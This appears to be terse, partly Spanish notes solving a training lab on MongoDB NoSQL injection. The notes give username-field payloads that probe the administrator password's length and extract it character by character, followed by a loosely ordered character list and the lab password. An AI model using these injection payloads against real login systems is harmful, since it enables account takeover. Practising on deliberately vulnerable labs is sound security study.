The login functionality for this lab is powered by a MongoDB NoSQL database. It is vulnerable to NoSQL injection using MongoDB operators.To solve the lab, log into the application as the administrator user.You can log in to your own account using the following credentials: wiener:peter.
The login functionality for this lab is powered by a MongoDB NoSQL database. It is vulnerable to NoSQL injection using MongoDB operators.
To solve the lab, log into the application as the administrator user.
administrator
You can log in to your own account using the following credentials: wiener:peter.
wiener:peter
Cambiamos el parametro de usuario a administrator' && this.password.length < 30 || 'a'=='b,
administrator' && this.password.length < 30 || 'a'=='b
administrator' && this.password[$0$]=='$a$
La contraseña es de 8 caracteres
2
q
3
7
d
1
f
6
z
0
n
4
v
User: administrator Password:nfqqvczd
Last updated 1 year ago
